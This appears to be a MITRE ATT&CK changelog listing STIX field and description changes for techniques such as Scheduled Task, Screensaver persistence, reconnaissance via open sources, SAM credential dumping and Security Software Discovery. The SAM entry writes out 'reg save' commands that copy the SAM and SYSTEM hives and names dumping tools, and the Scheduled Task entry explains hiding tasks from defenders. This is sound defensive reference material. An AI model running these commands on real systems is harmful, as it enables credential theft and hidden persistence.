Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Andrew Northern, @ex_raritas', 'Bryan Campbell, @bry_campbell', 'Zachary Abzug, @ZackDoesML', 'Selena Larson, @selenalarson', 'Sittikorn Sangrattanapitak'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-30 14:26:44.730000+00:00 | 2022-07-06 20:20:13.871000+00:00 |
| description | Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) |
| external_references[1]['source_name'] | Twitter Leoloobeek Scheduled Task | SigmaHQ |
| external_references[1]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022. |
| external_references[1]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml |
| external_references[2]['source_name'] | TechNet Forum Scheduled Task Operational Setting | ProofPoint Serpent |
| external_references[2]['description'] | Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017. | Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022. |
| external_references[2]['url'] | https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen | https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
| external_references[3]['source_name'] | TechNet Scheduled Task Events | Defending Against Scheduled Task Attacks in Windows Environments |
| external_references[3]['description'] | Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017. | Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022. |
| external_references[3]['url'] | https://technet.microsoft.com/library/dd315590.aspx | https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
| external_references[4]['source_name'] | Microsoft Scheduled Task Events Win10 | Twitter Leoloobeek Scheduled Task |
| external_references[4]['description'] | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events | https://twitter.com/leoloobeek/status/939248813465853953 |
| external_references[5]['source_name'] | TechNet Autoruns | Tarrask scheduled task |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ |
| x_mitre_data_sources[1] | Command: Command Execution | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Scheduled Task Events Win10', 'description': 'Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events'} | |
| external_references | {'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'} | |
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} | |
| external_references | {'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'} | |
| x_mitre_data_sources | File: File Modification |
| Old Description | New Description |
|---|---|
| Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-557 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:36:26.445000+00:00 | 2022-04-14 20:59:52.686000+00:00 |
| description | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) |
| external_references[1]['source_name'] | capec | ProofPoint Serpent |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/557.html | https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
| x_mitre_data_sources[0] | File: File Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_data_sources[2] | Scheduled Job: Scheduled Job Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[4] | File: File Modification | File: File Creation |
| x_mitre_data_sources[5] | Process: Process Creation | Command: Command Execution |
| x_mitre_version | 2.1 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/557.html', 'external_id': 'CAPEC-557'} | |
| x_mitre_contributors | Andrew Northern, @ex_raritas | |
| x_mitre_contributors | Bryan Campbell, @bry_campbell | |
| x_mitre_contributors | Zachary Abzug, @ZackDoesML | |
| x_mitre_contributors | Selena Larson, @selenalarson |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) |
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 12:23:04.955000+00:00 | 2022-04-20 16:58:48.140000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) |
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017) |
| external_references[1]['source_name'] | Wikipedia Screensaver | ESET Gazer Aug 2017 |
| external_references[1]['description'] | Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017. | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Screensaver | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
| external_references[2]['source_name'] | ESET Gazer Aug 2017 | Wikipedia Screensaver |
| external_references[2]['description'] | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. | Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017. |
| external_references[2]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf | https://en.wikipedia.org/wiki/Screensaver |
| x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[3] | File: File Creation | Command: Command Execution |
| x_mitre_data_sources[4] | File: File Modification | Process: Process Creation |
| Description |
|---|
| Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:50:44.308000+00:00 | 2022-10-18 22:45:19.607000+00:00 |
| external_references[1]['source_name'] | WHOIS | Circl Passive DNS |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://www.whois.net/ | https://www.circl.lu/services/passive-dns/ |
| external_references[3]['source_name'] | Circl Passive DNS | Medium SSL Cert |
| external_references[3]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.circl.lu/services/passive-dns/ | https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 |
| external_references[4]['source_name'] | Medium SSL Cert | WHOIS |
| external_references[4]['description'] | Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. |
| external_references[4]['url'] | https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 | https://www.whois.net/ |
| external_references[5]['source_name'] | SSLShopper Lookup | Shodan |
| external_references[5]['description'] | SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. | Shodan. (n.d.). Shodan. Retrieved October 20, 2020. |
| external_references[5]['url'] | https://www.sslshopper.com/ssl-checker.html | https://shodan.io |
| external_references[6]['source_name'] | DigitalShadows CDN | SSLShopper Lookup |
| external_references[6]['description'] | Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020. | SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. |
| external_references[6]['url'] | https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ | https://www.sslshopper.com/ssl-checker.html |
| external_references[7]['source_name'] | Shodan | DigitalShadows CDN |
| external_references[7]['description'] | Shodan. (n.d.). Shodan. Retrieved October 20, 2020. | Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020. |
| external_references[7]['url'] | https://shodan.io | https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ |
| Description |
|---|
| Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). |
New Mitigations:
Dropped Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:52:41.104000+00:00 | 2022-10-18 22:48:33.286000+00:00 |
| external_references[1]['source_name'] | Cyware Social Media | SecurityTrails Google Hacking |
| external_references[1]['description'] | Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020. | Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e | https://securitytrails.com/blog/google-hacking-techniques |
| external_references[2]['source_name'] | SecurityTrails Google Hacking | Cyware Social Media |
| external_references[2]['description'] | Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020. | Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://securitytrails.com/blog/google-hacking-techniques | https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+. |
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:17:30.640000+00:00 | 2022-06-15 16:17:19.049000+00:00 |
| description | Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
|
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* reg save HKLM\sam sam
* reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) |
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Isif Ibrahima, Mandiant'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
